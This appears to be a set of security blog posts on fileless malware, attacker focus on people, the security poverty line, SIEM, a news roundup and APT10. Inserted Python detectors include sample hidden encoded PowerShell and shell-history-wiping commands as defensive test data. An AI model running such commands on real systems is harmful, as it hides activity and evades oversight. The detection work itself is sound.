Given you're here, you're likely new to this topic, so please be aware that "fileless malware", "fileless malware attack", and "fileless attack" are different names for the same thing. With that clear, let's jump in!

What is Fileless Malware and How Does It Work?

There are many definitions of a fileless malware attack. I like the description from the Ponemon Institute:

"A fileless attack is really an attack technique - what we're talking about is a technique - that avoids downloading malicious, executable files, usually to disk, at one stage or another by using exploits, macros, scripts, or legitimate system tools instead. Once compromised, these attacks also abuse legitimate systems and admin tools and processes to gain persistence, elevate privileges, and spread laterally across the network."

What's most confusing about these attacks is that they might not be 100% file-free. Typically, different technique types are termed "fileless", but that doesn't mean the malware or an entire attack campaign won't include executables at some stage. For example, a traditional phishing attack could have components of a fileless attack in it. Instead of you opening a file, or clicking on a link that downloads something to your hard drive, the malware may just run in your computer's memory. It's a phishing attack, but one piece of it is fileless. That scenario is more common than a completely fileless malware attack where everything runs in memory. More commonly, we're going to see traditional attacks (phishing campaigns, spoofs, Man-in-the-Middle (MitM) attacks) where something in the attack vector includes malicious code that runs in memory.

The other point is that you might hear "fileless attacks" referred to as non-malware attacks, memory-based attacks, in-memory attacks, zero-footprint attacks, and macro attacks. These are all different flavors of attack techniques.
The whole premise behind the attack is that it is designed to evade protection by traditional file-based or signature-based tools. So any technique designed to circumvent or evade detection by those tools really falls into the fileless attack category. To get a picture of some of those techniques, the picture below (on the left) shows some example delivery methods we see for fileless types of attacks. As we know, phishing and social engineering remain tactics that work for attackers.

This nice diagram from Microsoft shows a full taxonomy of fileless threats. It shows the breadth of the different techniques, and of the tools, tactics, and procedures, that malicious attackers are using to launch attacks.

There has been an increase in these attacks. McAfee puts it at 432% growth year over year in the PowerShell malware they've witnessed, and SentinelOne found a 94% increase in just the first half of 2018. We're seeing these attack methods persist because they are effective. Attackers are also looking for ways to infiltrate that don't require some kind of vulnerability exploit, in order to evade detection.

Trusted Admin Tools Leveraged for Fileless Attacks

Living off the land is the use of trusted admin tools to conduct malicious activity. It's a way to hide in plain sight. These methods help attackers gain persistence within your environment, elevate privileges, and spread laterally across the network. Commonly, we see these with PowerShell and WMI. We've also seen some using Visual Basic scripts and UAC bypass, where attackers are leveraging trusted tools to perform malicious actions. This is true within Linux as well as Windows.

Example of a Fileless Malware Attack: GZipDe

Here's an example of an attack and how, at different stages, we see the use of sanctioned applications or vectors that might not register with a file detection tool. Our AlienVault Labs team wrote about this in a blog post in 2018.
The way this attack works is through an email phishing campaign that includes an attachment, such as a normal-looking Word document. Once you open that Word document, there's a malicious macro. Once macros are enabled, a Visual Basic script executes, which launches a hidden PowerShell task, which then connects out, downloads Metasploit and runs it in memory. You see a mix of file-based and fileless attack throughout the process. At first glance, it looks like a traditional attack; everyone is familiar with phishing campaigns. Then, as you go through the process, it runs complete programs or attacks in memory, not writing anything to disk, so that an anti-virus can't see it. It also makes the attack non-persistent. If an attacker is trying to evade audit and capture at a later point, fileless attacks are great for that.

Have a Suspect Machine?

One of the first steps people take to investigate and audit a suspect machine is to isolate it and turn it off. Since everything runs in memory in these types of attacks, as soon as you turn a suspect machine off, all evidence of the attack will be gone. There are ways to make these attacks persistent: you can write cron jobs or scheduled tasks to a system from a PowerShell script to attain persistence. Generally, however, fileless malware attacks are gone once you reboot the computer.

Fileless Malware Detection

AlienVault® Open Threat Exchange® (OTX™) is a community of security researchers and practitioners. Individuals contribute information to the community after seeing attacks unfold in their environments, to help others in the community keep up to date. It's a great resource for anyone who wants to get an understanding of what's happening in the wild. I searched OTX™ for a few examples of fileless campaigns that we saw in 2018. This is from a quick search of "fileless". A perfect example of a fileless campaign is GhostMiner cryptomining. It was first recognized a few hundred days ago in our community.
It started out as something you would download to your hard drive. It has morphed over time to using a PowerShell evasion framework so that they can execute the program within memory rather than downloading it to your drive. It installs cryptomining software, but in a new way.

What does it take to detect and defend against these attacks? They are designed to evade file- and signature-based protection tools, the traditional anti-virus types of tools. What you need is better visibility on the host and on the endpoint. Some of the ways to detect them include looking for processes executing shell commands, or suspicious commands executed by listening processes like Elasticsearch. We might see excessive network communications from processes that are somewhat abnormal or anomalous, as well as limited persistence and privilege escalation. We might also see attackers trying to cover their tracks by deleting their bash history or installing malicious Chrome browser extensions. All of these can be indicators that there is some type of fileless malware attack occurring in your environment. You're going to need to spot anomalous behavior rather than a specific Indicator of Compromise (IoC).

To summarize:

Conclusion

The growing trend of fileless malware attacks will definitely make your life as a defender more challenging. There are free tools, like OTX, to help you keep up, and other offerings, like USM Anywhere, to help quickly detect fileless attacks and prevent damage, even when there aren't yet signatures or IoCs identified for the morphed version of the fileless malware. If you're curious to explore further, check out the Fileless Attacks webcast by Danielle Russell and Aaron Genereaux, where they walk you through actual detection examples.
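The detection ideas above (a listening process such as Elasticsearch spawning a shell, an Office document launching a script host, hidden encoded PowerShell, deleted bash history) expressed as behavioural heuristics over process-creation telemetry. This is an added example written for this page, not code from the original post and not part of OTX or USM Anywhere; the event schema, the process name lists, the thresholds and the sample events are all assumptions made for the example.

```python
"""Added example, not code from the original post: heuristics for the fileless
indicators the post names (listening services spawning shells, Office documents
launching script hosts, hidden/encoded PowerShell, shell history deletion),
run over constructed process-creation telemetry. The event schema, the process
lists and all sample events are assumptions made for this example."""
from dataclasses import dataclass

# Shell and script interpreters whose appearance as a child process is interesting
SHELLS = {"bash", "sh", "dash", "zsh", "cmd.exe", "powershell.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Network-facing services that have no business spawning a shell
# (sshd is deliberately absent: spawning shells is its job)
LISTENING_SERVICES = {"java", "elasticsearch", "nginx", "httpd", "redis-server", "mongod"}
# Office applications that should never be the parent of a script host
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass
class ProcEvent:
    """One process-creation record (assumed schema)."""
    host: str
    parent: str   # image name of the parent process
    image: str    # image name of the newly created process
    cmdline: str


def detect_fileless_indicators(events):
    """Return (rule, host, cmdline) tuples; one tuple per rule an event trips."""
    findings = []
    for ev in events:
        parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()

        # "suspicious commands executed by listening processes like Elasticsearch"
        if parent in LISTENING_SERVICES and image in SHELLS:
            findings.append(("listening_service_spawned_shell", ev.host, ev.cmdline))

        # a macro-enabled document launching PowerShell / WScript
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append(("office_spawned_script_host", ev.host, ev.cmdline))

        # hidden window plus an encoded command is the classic in-memory launcher shape;
        # -nop (no profile) is also typical of such one-liners
        encoded = any(flag in cmd for flag in ("-enc ", "-encodedcommand ", "-e "))
        stealthy = any(flag in cmd for flag in ("-w hidden", "-windowstyle hidden", "-nop "))
        if image == "powershell.exe" and encoded and stealthy:
            findings.append(("hidden_encoded_powershell", ev.host, ev.cmdline))

        # attackers "deleting their bash history" to cover their tracks
        wipes_history = "history -c" in cmd or (
            ".bash_history" in cmd and any(tok in cmd for tok in ("rm ", "> ", "unset histfile"))
        )
        if image in SHELLS and wipes_history:
            findings.append(("shell_history_tampering", ev.host, ev.cmdline))
    return findings


# Constructed sample telemetry (not real data); the base64 blob decodes to "PLACEHOLDER"
SAMPLE_EVENTS = [
    ProcEvent("ws01", "winword.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -enc UABMAEEAQwBFAEgATwBMAEQARQBSAA=="),
    ProcEvent("srv-es01", "java", "bash", "bash -c 'id; uname -a'"),
    ProcEvent("srv-es01", "bash", "bash", "bash -c 'history -c; rm -f ~/.bash_history'"),
    ProcEvent("ws02", "explorer.exe", "powershell.exe",
              "powershell.exe -File C:\\scripts\\backup.ps1"),   # benign admin script
    ProcEvent("srv-es01", "sshd", "bash", "bash -l"),            # benign interactive login
]


def run_sample():
    """Run the heuristics over the constructed telemetry."""
    return detect_fileless_indicators(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, host, cmdline in run_sample():
        print(f"{host}: {rule}: {cmdline}")
```

The point of the parent/child pairing is that none of these process names is malicious on its own: PowerShell launched by Explorer and a shell spawned by sshd pass through, while the same binaries launched by Word or by a Java service are reported. Each rule is a behaviour, not a hash, which is what the post means by spotting anomalous behaviour rather than a specific IoC.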
Cyber security has three pillars: people, process, and technology. Enterprises have historically had a skewed focus towards the technology aspect of cyber security: installing another endpoint agent, or deploying another network monitoring device designed to seek out anomalous behaviour. While all these things are well and good, when you look at user awareness plans, most companies have a once-a-year activity where they go over a few points and hope people remain educated. And as far as processes go … well, it's unclear how much of a conscious effort is put into developing robust processes for cyber security, particularly in small and medium businesses.

If we take an unscientific look at some of the trends over the last couple of years, we can see that attacks coming from non-state adversaries have been changing some of their tactics. It is no longer possible for most attackers to waltz in through the virtual front door of organizations and access their data, which is why many attackers focus on different areas. Three of the most commonly spotted areas are as follows:

Employees

Going after employees is a tried and tested method. Be that dropping USB drives marked "HR bonus list" in the car park, or sending targeted phishing emails, these attacks have proven to stand the test of time. Phishing emails have been used in many ransomware infections, and Business Email Compromise (BEC) attacks likewise rely on duping users within a company. At the beginning of 2019 it was reported that the Indian unit of an Italian firm was targeted, and the attackers managed to swindle $18.6m. This trend shows no signs of slowing down: BEC fraud attacks soared 58% in the UK during 2018, possibly affecting as many as half a million SMEs, according to Lloyds Bank data.

Customers

Employees aren't the only ones targeted by criminals. Customers of companies are also fair game in the eyes of hackers.
Phishing attacks are a common avenue, with scammers masquerading as popular brands such as Apple or Amazon, adopting threatening behaviour while posing as law enforcement or the tax office, or even pulling at emotions such as love and greed. In fact, a Netflix phishing scam was so bad that even the FTC issued a statement warning customers about it. But phishing isn't the only attack avenue against customers. Credential stuffing has also risen in popularity. This is where scammers take the passwords of users that have been disclosed in breaches, and use those credentials against other systems in the hope that users have reused passwords across different services.

Third Parties

Another avenue attackers target is third parties. This could be any company in the supply chain, or with whom the target has a business relationship. The infamous Target breach of 2013 was conducted after attackers broke in via an HVAC company. In a more recent incident, LocalBitcoins was targeted by attackers who were able to compromise the site's forums and redirect users to a phishing site from where they captured users' credentials.

Recommendations

Cyber security is perhaps the most challenging game of whack-a-mole in existence. Where we plug one hole, the attackers move to another, easier-to-exploit hole. With this, we should look to continually move forward and proactively try to stop attackers' new tactics from becoming full-fledged epidemics. To do so, enterprises need a consistent approach not just to user awareness, but also to raising awareness among their customers and third-party partners. The most important things to consider would be:

Password reuse

Raise awareness of the dangers and risks associated with password reuse. Also provide tools or methods to help eliminate password reuse, such as the use of password managers.
Clicking on links & opening attachments

While users within enterprises are getting some training on the dangers of clicking links or opening email attachments, this should extend to customers too. Establish good practices by avoiding sending links in emails, and ask users to navigate directly to the website to log on to their accounts.

Reporting issues

Finally, and perhaps most importantly, have a simple and accessible way for both employees and customers to report any suspicious activity, or indeed to report that they may have fallen victim to a scam by clicking on a link, opening an attachment, or sending sensitive information to a scammer.
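The credential-stuffing pattern described under "Customers" above, and the password-reuse recommendation, seen from the defender's side of the login endpoint. This is an added example written for this page, not code from the original post: it flags a source address that tries many different accounts in a short window with mostly failures, and reports which accounts a reused password actually opened, since those are the ones to reset first. The log line format, the thresholds and the sample data are assumptions made for the example.

```python
"""Added example, not code from the original post: a credential-stuffing
detector run over constructed authentication log lines. The log format, the
thresholds and the sample data are assumptions made for this example."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log line shape: "<ISO-8601 UTC> ip=<source> user=<account> result=ok|fail"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)


def parse_line(line):
    """Return (timestamp, ip, user, result), or None for a line that does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ts, m["ip"], m["user"], m["result"]


def detect_credential_stuffing(lines, min_distinct_users=5,
                               window=timedelta(minutes=5), max_success_ratio=0.2):
    """Flag source IPs that try many *different* accounts in a short window
    with mostly failures. One account failing repeatedly looks like a forgotten
    password; many accounts each tried once looks like a breached credential
    list being replayed. Successful logins from a flagged source are the
    accounts whose reused password worked."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec[1]].append(rec)

    suspicious = {}
    for ip, recs in by_ip.items():
        recs.sort()  # tuples sort by timestamp first
        for i, (start, _, _, _) in enumerate(recs):
            # every attempt from this IP within `window` of attempt i
            in_window = [r for r in recs[i:] if r[0] - start <= window]
            users = {r[2] for r in in_window}
            if len(users) < min_distinct_users:
                continue
            ok_attempts = [r for r in in_window if r[3] == "ok"]
            if len(ok_attempts) / len(in_window) <= max_success_ratio:
                suspicious[ip] = {
                    "window_start": start.isoformat(),
                    "attempts": len(in_window),
                    "distinct_users": len(users),
                    "compromised_accounts": sorted({r[2] for r in ok_attempts}),
                }
                break  # one report per source is enough
    return suspicious


# Constructed sample log (not real data)
SAMPLE_LOG = """
2019-02-01T10:00:00Z ip=203.0.113.5 user=alice result=fail
2019-02-01T10:00:12Z ip=203.0.113.5 user=bob result=fail
2019-02-01T10:00:25Z ip=203.0.113.5 user=carol result=fail
2019-02-01T10:00:40Z ip=203.0.113.5 user=dave result=ok
2019-02-01T10:00:55Z ip=203.0.113.5 user=erin result=fail
2019-02-01T10:01:10Z ip=203.0.113.5 user=frank result=fail
2019-02-01T10:02:00Z ip=198.51.100.7 user=alice result=fail
2019-02-01T10:02:30Z ip=198.51.100.7 user=alice result=fail
2019-02-01T10:03:00Z ip=198.51.100.7 user=alice result=ok
2019-02-01T10:04:00Z ip=192.0.2.9 user=grace result=fail
2019-02-01T10:04:10Z ip=192.0.2.9 user=heidi result=fail
this line is malformed and is skipped by the parser
""".strip().splitlines()


def run_sample():
    """Run the detector over the constructed log."""
    return detect_credential_stuffing(SAMPLE_LOG)


if __name__ == "__main__":
    for ip, report in run_sample().items():
        print(ip, report)
```

Note what the detector does not flag: the user who fails twice and then logs in from one address (one account, not many) and the address that touches only two accounts. The distinct-account count is the discriminator; a plain failed-login counter would fire on the forgotten password and stay quiet on a slow, low-failure stuffing run.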
Security Haves and Have-Nots

Way back in around the 2010/2011 timeframe, Wendy Nather coined the phrase "The Security Poverty Line", in which she hypothesised that organisations, for one reason or another (usually lack of funds), can't afford to reach an effective level of information security. Nearly a decade on, and while the term has sunk into frequent usage within the information security community, are we any better at solving the issue now that we've identified it?

I asked Wendy for her thoughts, to which she said, "I don't think we've even come close to understanding it yet. And I think solving it will take an effort on the level of US health care reform."

It's a morbid thought, and can leave one with a feeling of helplessness. So, I thought I'd try to scratch beneath the surface to see what we can understand about the security poverty line.

Technical Debt

The term technical debt has become more prevalent within information security over the years. It describes how a company accrues technical debt, or information security risk, over time due to decisions it has made. For example, if a service is launched before undertaking a full penetration test or code review, it adds to the debt of fixing any subsequent issues in a live environment.

Exponential Losses

One of the challenges with technical debt is that it doesn't accrue in a linear manner; rather the debt, or the fall below the poverty line, occurs at an exponential rate. Speaking to people who run small businesses, things become a bit clearer as to some of the challenges they face. Cybersecurity needs investment in different areas: initially that is to hire expertise or invest in technologies, neither of which are necessarily the smallest of investments. But then there are ongoing costs: the cost to maintain security, and to undertake ongoing testing.
Then, when wanting to do business with larger companies, the smaller company is usually subject to a third-party assurance process where they need to demonstrate they meet all the cybersecurity requirements of the larger company, even in instances where the controls may not be directly applicable. Finally, in the event of an incident, a company that has already under-invested in security is faced with loss of business, or even legal action from partners, regulatory fines, as well as the cost of incident recovery and PR management.

How Much Information Security is Enough?

With such a seemingly endless laundry list of things to consider in the security world, the question on the minds of most businesses is, "how much is enough?" Unfortunately, if you're looking for a hard number, you'll be disappointed, because the threats and challenges present in the cyber world represent a moving target. But this doesn't mean all effort is futile; it's more a case of looking at the world differently.

One way to look at this could be through the lens of finite and infinite games, as coined by James Carse in his 1986 book of the same name. The idea is that there are two kinds of games: finite and infinite. Finite games are those which have rules such as number of participants, boundaries, time duration, and so forth. After a certain period of time, a winner is declared in accordance with the agreed-upon rules. If you try to look at cyber security as a finite game, you will inevitably pull your hair out in frustration and turn into precisely how Urban Dictionary describes infosec. Cyber security is more of an infinite game, one where there are no set rules or boundaries, or even a winner or loser as defined in the classical sense. Rather, the purpose of an infinite game is to always be in a position to continue the game.

Continuing The Game

Asking companies to continue the game when resources are scarce and they're living on the security poverty line.
But once you understand the game, the players, the pieces, and the moves, it becomes easier to plan your strategy. For that, it's useful to consider the following points.

1. People

Having the right people can be the difference between making it or not. It doesn't necessarily mean hiring an entire security department. Sometimes, all it needs is a consultant to help provide guidance and steer towards best security practices, to ensure security is built in right from the beginning.

2. Technology

IT security technologies have come a long way in the last decade. While the constant news cycle may make it feel like things are getting worse, what we actually see is more attacks that focus on attacking humans through phishing, or compromises through third parties. Therefore, it makes sense to invest in technologies that offer a broader set of capabilities. These can be more affordable, not just to buy, but to maintain on an ongoing basis.

3. Outsourcing

In today's age of the cloud and service providers, in many cases it doesn't make sense to keep everything in-house. Securing the services of a reputable MSSP can take away the need to run your own security operations centre. Or having a PR agency on retainer can help smooth over any incidents that need reporting.

4. Insurance

Finally, where risk can't be mitigated or accepted, consider transferring it to an insurance provider. Not only can insurance help alleviate the financial cost of a breach, but it can go a long way in demonstrating to customers, shareholders, or partners that insurance was part of a broad cyber security plan to keep data secure.
Security information and event management (SIEM) technology is transforming the way IT teams identify cyber threats, collect and analyze threat data, and respond to security incidents. But what does that all mean? To better understand SIEM, let's take a look at SIEM technology, how it works and its benefits.

What Is SIEM?

SIEM technology is a combination of security event management (SEM) and security information management (SIM) technologies. IT teams use SEM technology to review log and event data from a business' networks, systems and other IT environments, understand cyber threats and prepare accordingly. Comparatively, IT teams use SIM technology to retrieve and report on log data.

How Does SIEM Work?

IT teams use SIEM technology to collect log data across a business' infrastructure; this data comes from applications, networks, security devices and other sources. IT teams can then use this data to detect, categorize and analyze security incidents. Finally, with security insights in hand, IT teams can alert business leaders about security issues, produce compliance reports and discover the best ways to safeguard a business against cyber threats.

What Are the Benefits of SIEM?

SIEM technology frequently helps businesses reduce security breaches and improve threat detection. The AlienVault infographic and "2019 SIEM Survey Report" revealed that 76 percent of cyber security professionals reported their organization's use of SIEM tools resulted in a reduction in security breaches. Additionally, 46 percent of survey respondents said their organization's SIEM platform detects at least half of all security incidents. Also, SIEM tools typically provide compliance reporting, something that is exceedingly valuable for businesses that must comply with the European Union (EU) General Data Protection Regulation (GDPR) and other data security mandates.
SIEM tools often come equipped with compliance reporting capabilities, ensuring IT teams can use these tools to quickly identify and address security issues before they lead to compliance violations. SIEM tools help speed up incident response and remediation, too. A cyber security talent shortage plagues businesses worldwide, but SIEM tools help IT teams overcome this shortage. SIEM tools are generally simple to deploy, and they often can be used in combination with a business' third-party security tools. As such, SIEM tools sometimes reduce the need to hire additional cyber security professionals.

Is SIEM Right for My Business?

SIEM technology is designed for businesses of all sizes and across all industries. If a mid-sized retailer wants to protect its critical data against insider threats, for example, SIEM technology can help this business do just that. Or, if a globally recognized bank requires a user-friendly compliance management tool, it can deploy SIEM technology as part of its efforts to meet industry mandates. SIEM tools can even help businesses protect their Internet of Things (IoT) devices against cyber attacks, proactively seek out cyber threats and much more.

How Can I Select the Right SIEM Tool for My Business?

The right SIEM tool varies based on a business' security posture, its budget and other factors. However, the top SIEM tools usually offer the following capabilities:

- Compliance reporting
- Database and server access monitoring
- Incident response and forensics
- Internal and external threat identification
- Integrations with intrusion detection and prevention systems, firewalls, event and application logs, and other applications and systems
- Real-time threat monitoring, correlation and analysis across multiple systems and applications
- Threat intelligence
- User activity monitoring

Lastly, as you search for the right SIEM tool for your business, it often helps to partner with a proven SIEM technology provider.
If you have the right SIEM technology provider at your side, your business can seamlessly integrate a SIEM tool into its day-to-day operations. As a result, your IT team can use SIEM technology to streamline its security management.
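The collect, normalize and correlate flow described under "How Does SIEM Work?" above, in miniature. This is an added example written for this page; it is not code from the original post and not any vendor's SIEM. Three log sources with different line formats are normalized into one event schema, and a cross-source rule then fires when an IDS alert about a source address is followed within ten minutes by a successful login from that same address. The log formats, the schema, the rule, the window and the sample lines are all assumptions made for the example.

```python
"""Added example, not code from the original post and not any vendor's SIEM:
collect -> normalize -> correlate. Three log sources with different formats
are mapped onto one event schema, then a cross-source rule fires when an IDS
alert about a source address is followed by a successful login from that
address. The log formats, the schema, the rule and the sample lines are all
assumptions made for this example."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"

# Assumed source formats (constructed; not the real syntax of any product)
SOURCE_FORMATS = {
    "firewall": re.compile(r"^(?P<ts>\S+) FW action=(?P<action>\w+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)$"),
    "ids": re.compile(r'^(?P<ts>\S+) IDS sig="(?P<sig>[^"]+)" src=(?P<src>\S+) dst=(?P<dst>\S+)$'),
    "auth": re.compile(r"^(?P<ts>\S+) AUTH user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>ok|fail)$"),
}


def normalize(line):
    """Map one raw line onto the common schema {ts, source, src_ip, ...}, or return None."""
    for source, rx in SOURCE_FORMATS.items():
        m = rx.match(line.strip())
        if m:
            fields = m.groupdict()
            event = {
                "ts": datetime.strptime(fields.pop("ts"), TS_FMT),
                "source": source,
                "src_ip": fields.pop("src"),  # every source keys on the same field name
            }
            event.update(fields)
            return event
    return None


def correlate(events, window=timedelta(minutes=10)):
    """Rule: an IDS alert for src_ip followed, within `window`, by a successful
    AUTH event from the same src_ip. Either fact alone is routine; together
    they say the address that tripped the sensor went on to log in."""
    incidents = []
    alerts_by_ip = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["source"] == "ids":
            alerts_by_ip[ev["src_ip"]].append(ev)
        elif ev["source"] == "auth" and ev["result"] == "ok":
            for alert in alerts_by_ip.get(ev["src_ip"], []):
                if timedelta(0) <= ev["ts"] - alert["ts"] <= window:
                    incidents.append({
                        "src_ip": ev["src_ip"], "user": ev["user"], "signature": alert["sig"],
                        "alert_ts": alert["ts"].strftime(TS_FMT), "login_ts": ev["ts"].strftime(TS_FMT),
                    })
    return incidents


def run_pipeline(lines, window=timedelta(minutes=10)):
    """Collect -> normalize -> correlate; unparsed lines are counted, never silently dropped."""
    events, unparsed = [], 0
    for line in lines:
        ev = normalize(line)
        if ev is None:
            unparsed += 1
        else:
            events.append(ev)
    return {"events": len(events), "unparsed": unparsed, "incidents": correlate(events, window)}


# Constructed sample lines (not real data); the IDS signature names are made up
SAMPLE_LINES = """
2019-02-01T09:00:00Z FW action=allow src=203.0.113.5 dst=10.0.0.5 dport=22
2019-02-01T09:01:00Z IDS sig="example: SSH login brute force" src=203.0.113.5 dst=10.0.0.5
2019-02-01T09:02:00Z IDS sig="example: port sweep" src=198.51.100.7 dst=10.0.0.5
2019-02-01T09:05:00Z AUTH user=svc-backup src=203.0.113.5 result=ok
2019-02-01T09:06:00Z AUTH user=alice src=10.0.0.23 result=ok
2019-02-01T10:30:00Z AUTH user=bob src=198.51.100.7 result=ok
<ts missing> FW action=deny src=203.0.113.5 dst=10.0.0.6 dport=445
""".strip().splitlines()


def run_sample():
    """Run the pipeline over the constructed lines."""
    return run_pipeline(SAMPLE_LINES)


if __name__ == "__main__":
    print(run_sample())
```

Two design points carry over to a real deployment: the normalization step gives every source the same `src_ip` key, which is what makes a cross-source rule possible at all, and the unparsed-line counter is the check that a new log format or a changed one has not quietly blinded the correlation.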
Hello February! I was doing some research last night and was surprised to discover that the Target breach is over five years old! Five years! I was sure it only happened a couple of years ago, but such is the fast-paced nature of the industry, and also I guess a testament to how certain major breaches become part of infosec folklore. Like TJX, or Heartland, and no, I'm not going to look up when any of those occurred because I'll probably end up feeling a lot older than I already do. Enough reminiscing, let's get down to it.

The Big Five

There have been a lot of things I didn't heart this week, although for one reason or another they ended up in my list of things to talk about. So, if you're wondering about the stories regarding Facebook and Apple, and also Google, then yes, I did see them, and no, I don't fancy talking about them. But speaking of large companies, Kashmir Hill has undertaken what is perhaps becoming my favourite piece of tech journalism ever, with detailed write-ups and slick videos showcasing how she cut the big five of Amazon, Facebook, Google, Microsoft, and Apple out of her life, one week at a time.

Life without the tech giants | Gizmodo
Week 1, Amazon | Gizmodo
Week 2, Facebook | Gizmodo
Week 3, Google | Gizmodo

Considerations for When Your Apartment Goes "Smart"

Everything is getting 'smart' these days. By smart, I mean connected and vulnerable. So, what should you do if you live in an apartment where everyone is getting fancy new smart locks (or terribly insecure cheap locks, depending on how you look at it)? Lesley Carhart recently found herself in that position, and has written a really good post on security considerations if you ever find yourself in a similar one.

Security Things to Consider When Your Apartment Goes 'Smart' | tisiphone

Abusing Exchange: One API Call Away From Domain Admin

An attacker with just the credentials of a single lowly Exchange mailbox user can gain Domain Admin privileges by using a simple tool.
Very good write-up here.

Abusing Exchange: One API call away from Domain Admin | dirkjanm.io

Sending Love Letters

The "Love Letter" malspam campaign has now changed its focus to Japanese targets and almost doubled the volume of malicious attachments it delivers.

Love Letter Malspam Serves Cocktail of Malware, Heavily Targets Japan | Bleeping Computer

While we're talking about Japan, a new law in Japan allows the nation's National Institute of Information and Communications Technology (NICT) to hack into citizens' personal IoT equipment as part of a survey of vulnerable devices. The survey is part of an effort to strengthen Japan's network of Internet of Things devices ahead of the 2020 Tokyo Olympic games. I like the intent behind this initiative, but the execution leaves me a little worried. Scanning for devices is one thing; actively logging into a device is another. It will be interesting to see how this pans out.

Japan Authorizes IoT Hacking | Dark Reading

South Korean Delivery Apps Accidentally Leak 26M Documents

The Korean Android apps Zcall Delivery Agent and Zcall Delivery Account Manager, which are used to schedule and report package pickups and deliveries, have accidentally leaked personal information about their users. The leaked data includes not only names, addresses, phone numbers, and delivery times, but also plaintext passwords for shop and staff logins, as well as what appears to be plaintext banking information. A statement on the company's website acknowledges the leak and assures customers that the outflow route has been blocked, but blames the incident on the Korea Internet Promotion Agency, rather than a hacking intrusion on their servers.

South Korean Delivery Apps Accidentally Leaks 26m Documents | The Daily Swig

Judge Rejects Yahoo's Data Breach Settlement Proposal

Yahoo's proposed $50 million pay-out, plus two years of free credit monitoring for about 200 million people in the United States and Israel, was rebuffed by U.S. District Judge Lucy Koh, who said she couldn't declare the settlement "fundamentally fair, adequate and reasonable" because it did not say how much victims could expect to recover, according to court documents. In 2016, the massive data breach compromised the information of more than one billion Yahoo users, affecting email addresses and other personal information, marking the largest data breach in history.

Judge rejects Yahoo's data breach settlement proposal | SC Magazine

Inside the UAE's Secret Hacking Team of American Mercenaries

Presented without comment; it's a long article worth reading and drawing your own conclusions.

Inside the UAE's secret hacking team of American Mercenaries | Reuters

Other Things I Hearted This Week

Work Is Not Your Family, As The Fyre Festival Doc Reminds Us | Huffington Post
2019 Tech M&A Outlook | 451 Research
Looking for fraud | Antisocial engineer
Threat Actors That Don't Discriminate

When it comes to threat actors and the malware variants they use, let's talk dating — or rather, the way people date — because one could argue there are marked similarities between the two. You see, there are criminal groups who have a "type," i.e. using malware that targets specific industries or even organizations — say, financial services (ever-popular and oh-so debonair) or perhaps critical infrastructure (spicy and daring!), or even healthcare for those who prefer staid and demure. Yet other groups are the free lovin' types who go after multiple sectors using many different malware variants and approaches to accomplish their goal — no discriminating with this bunch.

Let's look at one such example, APT10 / Cloud Hopper, which is likely the group behind a long-running, sophisticated campaign that uses multiple malware variants to target many different sectors in many different countries. You can check out some of the pulses relating to APT10 / Cloud Hopper on the Open Threat Exchange (OTX). The U.S. National Cybersecurity and Communications Integration Center (NCCIC) reports the campaign started in May 2016, and NCCIC last updated its alert in December 2018 — so it's not going away yet.

The group known as APT10 / Cloud Hopper has hit quite a few victims over the last few years in many different sectors, such as information technology, energy, healthcare and public health, communications, and critical manufacturing. However, their "date of choice" seems to be MSSPs, due to the fact that credential compromises within those networks could potentially be leveraged to access customer environments. From the OTX pulse "Operation Cloud Hopper":

The espionage campaign has targeted managed IT service providers (MSSPs), allowing the APT10 group unprecedented potential access to the intellectual property and sensitive data of those MSSPs and their clients globally.
This indirect approach of reaching many through only a few targets demonstrates a new level of maturity in cyber espionage – so it's more important than ever to have a comprehensive view of all the threats your organization might be exposed to, either directly or through your supply chain.

As any clever serial dater would do, APT10 / Cloud Hopper doesn't use just one approach. The NCCIC reports they have deployed multiple malware families and variants, some of which are currently not detected by anti-virus signatures — for example, PLUGX / SOGU and REDLEAVES. And although the observed malware is based on existing malware code, APT10 / Cloud Hopper modifies it to improve effectiveness and avoid detection by existing signatures.

How Can APT10 Group Impact You?

If these free lovin' bad guys decide to come after you, they're likely looking for your data (perhaps to steal intellectual property). At a high level, they accomplish this by leveraging stolen administrative credentials (local and domain) and certificates to place sophisticated malware implants (such as PlugX and RedLeaves) on critical systems. Depending on the defensive mitigations in place, they then gain full access to networks and data in a way that appears legitimate to your existing monitoring tools. Voila! They've gone from first date to a home run!

Wired Magazine reported the following on APT10 in a December 2018 article:

"In the case of the MSP intrusions, that malware appears to have mostly made up of customized variants of PlugX, RedLeaves—which have previously been linked to Chinese actors—and QuasarRAT, an open source remote access trojan. The malware posed as legitimate on a victim's computer to avoid antivirus detection, and communicated with any of the 1,300 unique domains APT10 registered for the campaign."

What Can You Do About APT10 Group?
For sophisticated, long-standing, and non-discriminating campaigns such as this, the NCCIC suggests there is no single defensive technique or program, nor any set of them, that will completely avert all malicious activity, because new variants are constantly being created. Instead, security pros should use a defense-in-depth approach (multiple layers of security) to provide a complex barrier to entry and increase the likelihood of detection. Among the key recommendations are the following (which can be easily managed via the AlienVault Unified Security Management (USM) platform):

- Conduct regular vulnerability scans of the internal and external networks and hosted content to identify and mitigate vulnerabilities.
- Implement an Intrusion Detection System (IDS) to conduct continuous monitoring, send alerts to a SIEM tool, and monitor internal activity.

